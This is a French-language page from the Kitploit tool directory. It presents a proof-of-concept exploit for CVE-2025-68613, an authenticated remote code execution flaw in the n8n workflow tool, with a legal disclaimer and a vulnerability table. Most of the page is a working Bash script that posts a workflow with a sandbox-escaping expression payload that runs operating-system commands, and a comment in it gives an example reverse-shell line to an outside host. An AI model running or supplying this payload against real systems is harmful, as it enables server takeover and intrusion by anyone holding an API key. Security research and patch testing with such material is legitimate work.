Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613 — Exploit de preuve de concept pour CVE-2025-68613 : exécution de code à distance authentifiée dans n8n via injection d'expression | Kitploit
Outils/GitHubGitHub/mbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubmbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613

Exploit de preuve de concept pour CVE-2025-68613 : exécution de code à distance authentifiée dans n8n via injection d'expression

Voir le dépôt
2il y a 7 moisPas encore vérifié

n8n RCE par injection d'expression authentifiée – CVE-2025-68613

Exécution de code à distance critique (CVSS 9.9) dans l'outil d'automatisation de workflows n8n
Preuve de concept – Réservé à des fins éducatives et à la recherche de sécurité autorisée uniquement


⚠️ Avertissement légal important

Ce code est fourni STRICTEMENT à des fins éducatives et pour des tests de sécurité autorisés dans des environnements de laboratoire contrôlés.

Toute utilisation non autorisée sur des systèmes de production ou tout système sans autorisation écrite explicite est illégale et viole les lois sur les abus informatiques et la cybersécurité dans la plupart des juridictions.

Utilisation à vos risques et périls. L'auteur n'est pas responsable de toute mauvaise utilisation.


Informations sur la vulnérabilité

ChampDétails
Titre de l'exploitn8n - Exécution de code à distance par injection d'expression authentifiée
CVECVE-2025-68613
Date de divulgation2025-12-25
AuteurMohammed Idrees Banyamer
Pays de l'auteurJordanie
Contact / Réseaux sociauxInstagram : @banyamer_security
GitHubmbanyamer
Fournisseurn8n.io
Dépôt du logicielgithub.com/n8n-io/n8n
Versions vulnérables≥ 0.211.0 < 1.120.4
Versions corrigées1.120.4, 1.121.1, 1.122.0 et versions ultérieures
Testé surn8n 1.119.3 (Docker)
Type de vulnérabilitéExécution de code à distance authentifiée via contournement du bac à sable d'expressions
Score CVSS9.9 (Critique)

Description

Cette vulnérabilité permet à un utilisateur authentifié de créer ou de modifier des workflows à l'aide d'expressions malveillantes qui contournent le bac à sable d'expressions de n8n, entraînant l'exécution complète de commandes du système d'exploitation avec les privilèges du processus n8n.


Preuve de concept – Script d'exploitation Bash

root@kitploit:~
#!/bin/bash
# Exploit Title: n8n Authenticated Expression Injection RCE
# Date: 2025-12-25
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://n8n.io
# Software Link: https://github.com/n8n-io/n8n
# Version: >=0.211.0 <1.120.4
# Tested on: n8n 1.119.3 (Docker)
# CVE : CVE-2025-68613

TARGET="http://localhost:5678"                  # ← Change to your target
API_KEY="your_n8n_api_key_here"                 # ← Insert valid API Key (or use Basic Auth / session)
CMD="id"                                        # ← Test command
# Example reverse shell: "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"

echo "[*] Sending malicious workflow to ${TARGET}"

curl -s -X POST "${TARGET}/rest/workflows" \
  -H "Content-Type: application/json" \
  -H "X-N8N-API-KEY: ${API_KEY}" \
  -d '{
    "name": "CVE-2025-68613 PoC",
    "active": false,
    "nodes": [
      {
        "parameters": {
          "values": {
            "string": [
              {
                "name": "result",
                "value": "'${PAYLOAD}'"
              }
            ]
          }
        },
        "name": "Exploit",
        "type": "n8n-nodes-base.set",
        "typeVersion": 1,
        "position": [460, 300]
      }
    ],
    "connections": {}
  }'

echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"
Télécharger l’outil